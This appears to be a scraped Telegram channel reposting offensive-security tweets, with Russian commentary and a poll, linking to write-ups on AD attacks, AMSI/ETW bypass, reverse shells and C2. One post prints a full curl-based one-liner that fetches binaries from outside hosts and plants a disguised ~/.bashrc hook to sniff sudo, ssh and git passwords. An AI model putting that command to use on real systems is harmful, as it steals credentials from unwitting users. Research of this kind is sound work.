😈 [ Thorsten E. @endi24 ]
The only PowerShell Command you will ever need to find out who did what in Active Directory
by @PrzemyslawKlys
🔗 https://evotec.pl/the-only-powershell-command-you-will-ever-need-to-find-out-who-did-what-in-active-directory/
🐥 [ tweet ]
The only PowerShell Command you will ever need to find out who did what in Active Directory
by @PrzemyslawKlys
🔗 https://evotec.pl/the-only-powershell-command-you-will-ever-need-to-find-out-who-did-what-in-active-directory/
🐥 [ tweet ]
🔥4👍2
😈 [ ap @decoder_it ]
"Hello: I'm your Domain Administrator and I want to authenticate against you". My #SilverPotato is out, check the blog post: 😃
🔗 https://decoder.cloud/2024/04/24/hello-im-your-domain-admin-and-i-want-to-authenticate-against-you/
🐥 [ tweet ]
"Hello: I'm your Domain Administrator and I want to authenticate against you". My #SilverPotato is out, check the blog post: 😃
🔗 https://decoder.cloud/2024/04/24/hello-im-your-domain-admin-and-i-want-to-authenticate-against-you/
🐥 [ tweet ]
🔥4
😈 [ Jord @0xLegacyy ]
ETW-ByeBye: Disabling ETW-TI Without PPL
🔗 https://www.legacyy.xyz/defenseevasion/windows/2024/04/24/disabling-etw-ti-without-ppl.html
🐥 [ tweet ]
ETW-ByeBye: Disabling ETW-TI Without PPL
🔗 https://www.legacyy.xyz/defenseevasion/windows/2024/04/24/disabling-etw-ti-without-ppl.html
🐥 [ tweet ]
🔥3
😈 [ MDSec @MDSecLabs ]
New post on the blog… Exploiting CVE-2024-21111 : Local Privilege Escalation in Oracle VirtualBox by @filip_dragovic
🔗 https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/
🐥 [ tweet ]
New post on the blog… Exploiting CVE-2024-21111 : Local Privilege Escalation in Oracle VirtualBox by @filip_dragovic
🔗 https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/
🐥 [ tweet ]
👍4🔥1
😈 [ Lsec @lsecqt ]
Recently, I created a YT video on how to utilize Discord as C2 traffic broker:
Amazing job by @checkymander and the whole Mythic C2 team!
Great work guys!
🔗 https://youtu.be/YluiBE_E4ts
🐥 [ tweet ]
Recently, I created a YT video on how to utilize Discord as C2 traffic broker:
Amazing job by @checkymander and the whole Mythic C2 team!
Great work guys!
🔗 https://youtu.be/YluiBE_E4ts
🐥 [ tweet ]
👍6🥱3
😈 [ Viking @Vikingfr ]
How named pipes and Powershell could be used for creating Windows bind / reverse shell re-using Windows SMB port ? I show you in this blog post 😉
🔗 https://v1k1ngfr.github.io/fuegoshell/
🐥 [ tweet ]
How named pipes and Powershell could be used for creating Windows bind / reverse shell re-using Windows SMB port ? I show you in this blog post 😉
🔗 https://v1k1ngfr.github.io/fuegoshell/
🐥 [ tweet ]
👍10
😈 [ ap @decoder_it ]
#SilverPotato works also with Kerberos using @tiraniddo I mentioned in my latest post trick.
You will get an AP-REQ with SPN of the desired target server. Relaying is now just one step away..
🐥 [ tweet ]
#SilverPotato works also with Kerberos using @tiraniddo I mentioned in my latest post trick.
You will get an AP-REQ with SPN of the desired target server. Relaying is now just one step away..
🐥 [ tweet ]
👍5
😈 [ Raphael DUCOM @rducom ]
@techspence Or even better, use our automated loop:
🔗 https://github.com/LuccaSA/PingCastle-Notify
Credits: @mpgn_x64
🐥 [ tweet ]
This is such an awesome writeup, but it's missing one thing - remediation steps
Some AD admins may know how to fix these issues, but it's fair to assume some do not.
I'd also highly recommend using PingCastle by @mysmartlogon as it audits most of this and more.
@techspence Or even better, use our automated loop:
🔗 https://github.com/LuccaSA/PingCastle-Notify
Credits: @mpgn_x64
🐥 [ tweet ]
никогда не пользовался пингкаслом, но выглядит как то, что можно рекомендовать в роли бомж-чекапа ад на регулярной основе🔥2👍1🥱1
😈 [ Elliot @ElliotKillick ]
Reverse engineering the Windows 10 parallel loader is challenging but interesting work. I recently fully reversed the pivotal LdrpDrainWorkQueue function and I'm just now working on LdrpLoadDllInternal plus others
🔗 https://github.com/ElliotKillick/windows-vs-linux-loader-architecture#reverse-engineered-windows-loader-functions
🐥 [ tweet ]
Reverse engineering the Windows 10 parallel loader is challenging but interesting work. I recently fully reversed the pivotal LdrpDrainWorkQueue function and I'm just now working on LdrpLoadDllInternal plus others
🔗 https://github.com/ElliotKillick/windows-vs-linux-loader-architecture#reverse-engineered-windows-loader-functions
🐥 [ tweet ]
🔥4
I’ve missed the moment when the Ascension Endgame has been retired on @hackthebox_eu, but finally, here’s my write-up:
🔗 https://snovvcrash.rocks/2024/04/30/htb-ascension.html
This blog has been waiting its time in my drafts for almost 3 years now, and for me, this Endgame is still the best advanced lab on #HackTheBox. Many thanks to @egre55, @0_trx and all the @hackthebox_eu team!
P. S. It’s so cringe to read your own 3-year-old notes 🤦🏻♂️😅
🐥 [ tweet ]
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11🥱2🔥1
Offensive Xwitter
😈 [ ap @decoder_it ] #SilverPotato works also with Kerberos using @tiraniddo I mentioned in my latest post trick. You will get an AP-REQ with SPN of the desired target server. Relaying is now just one step away.. 🐥 [ tweet ]
😈 [ James Forshaw @tiraniddo ]
Taking a cue from @D1iv3 and @decoder_it's work on inducing authentication out of remote DCOM I thought I'd quickly write up a post about getting Kerberos authentication out of the initial OXID resolving call.
🔗 https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html
🐥 [ tweet ]
Taking a cue from @D1iv3 and @decoder_it's work on inducing authentication out of remote DCOM I thought I'd quickly write up a post about getting Kerberos authentication out of the initial OXID resolving call.
🔗 https://www.tiraniddo.dev/2024/04/relaying-kerberos-authentication-from.html
🐥 [ tweet ]
👍2🤯1
😈 [ Hope Walker @Icemoonhsv ]
Published part 2 of Manual LDAP Querying. This blog covers additional topics like user account control, password attributes, domain trusts, and more.
🔗 https://posts.specterops.io/manual-ldap-querying-part-2-8a65099e12e3
🐥 [ tweet ]
Published part 2 of Manual LDAP Querying. This blog covers additional topics like user account control, password attributes, domain trusts, and more.
🔗 https://posts.specterops.io/manual-ldap-querying-part-2-8a65099e12e3
🐥 [ tweet ]
👍4
😈 [ BC Security @bcsecurity ]
Missed the IronPython workshop? No worries, we have you covered with the recording posted to YouTube!
🔗 https://youtu.be/9XI1stt3gdE?si=drwkE6th39vCZlaj
🐥 [ tweet ]
Missed the IronPython workshop? No worries, we have you covered with the recording posted to YouTube!
🔗 https://youtu.be/9XI1stt3gdE?si=drwkE6th39vCZlaj
🐥 [ tweet ]
YouTube
Introduction to Offensive IronPython - April 2024
🔥6👍1
😈 [ OffSec @offsectraining ]
This blog introduces a new 0day technique discovered by OffSec Technical Trainer Victor “Vixx” Khoury, the process he used to exploit it, and the proof of concept code to bypass AMSI in PowerShell 5.1 and PowerShell 7.4:
🔗 https://offs.ec/44owQR3
🐥 [ tweet ]
This blog introduces a new 0day technique discovered by OffSec Technical Trainer Victor “Vixx” Khoury, the process he used to exploit it, and the proof of concept code to bypass AMSI in PowerShell 5.1 and PowerShell 7.4:
🔗 https://offs.ec/44owQR3
🐥 [ tweet ]
🔥3🥱2😁1
Forwarded from true_security
эту фичу можно использовать для получения кред из lsass в совокупности с описанными тут методами
P.S. сидел собирал собирал инфу а snovvcrash все уже давно описал =/
P.S. сидел собирал собирал инфу а snovvcrash все уже давно описал =/
👍10
Как относитесь к рекламам на канале?
Anonymous Poll
65%
Жить можно, все равно автор сас 🥰
35%
Резко негативно, атписка 🤬
👍1🥱1
😈 [ The Hacker's Choice (@thc@infosec.exchange) @hackerschoice ]
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
A ~/.bashrc 1-liner to sniff 🐶 sudo/ssh/git passwords (pty MitM). No root required 👀
command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& { mkdir -p ~/.config/.pty 2>/dev/null; :; } \
&& curl -o ~/.config/.pty/pty -fsSL "https://bin.ajam.dev/$(uname -m)/Baseutils/noscript" \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'🔗 https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet?tab=readme-ov-file#10-session-sniffing-and-hijaking
🐥 [ tweet ]
прикольно, напомнило https://ppn.snovvcrash.rocks/pentest/infrastructure/post-exploitation#vim-keylogger
🔥15😢1
😈 [ Rasta Mouse @_RastaMouse ]
[BLOG]
I integrated some Rust artifacts directly into CS 😱
Here's the blog post demonstrating how you can make your own.
🔗 https://rastamouse.me/custom-beacon-artifacts/
🐥 [ tweet ][ quote ]
[BLOG]
I integrated some Rust artifacts directly into CS 😱
Here's the blog post demonstrating how you can make your own.
🔗 https://rastamouse.me/custom-beacon-artifacts/
🐥 [ tweet ][ quote ]
🔥6👍1🥱1